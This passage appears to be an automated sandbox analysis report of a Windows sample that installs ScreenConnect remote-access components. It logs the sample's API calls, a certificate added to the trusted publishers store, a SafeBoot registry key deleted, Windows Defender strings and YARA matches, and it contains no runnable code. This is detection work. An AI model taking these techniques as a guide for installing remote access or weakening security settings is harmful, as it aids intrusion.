Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00BB1806
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Code function: 12_2_00884C71 RtlGetVersion, 12_2_00884C71
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (ae095c23-8e22-4747-b9a0-c8c8b34ba57d)
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\96r3GgxntQ.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob Jump to behavior
Source: Yara match File source: 10.0.ScreenConnect.WindowsClient.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dfsvc.exe PID: 7652, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 3708, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 5292, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs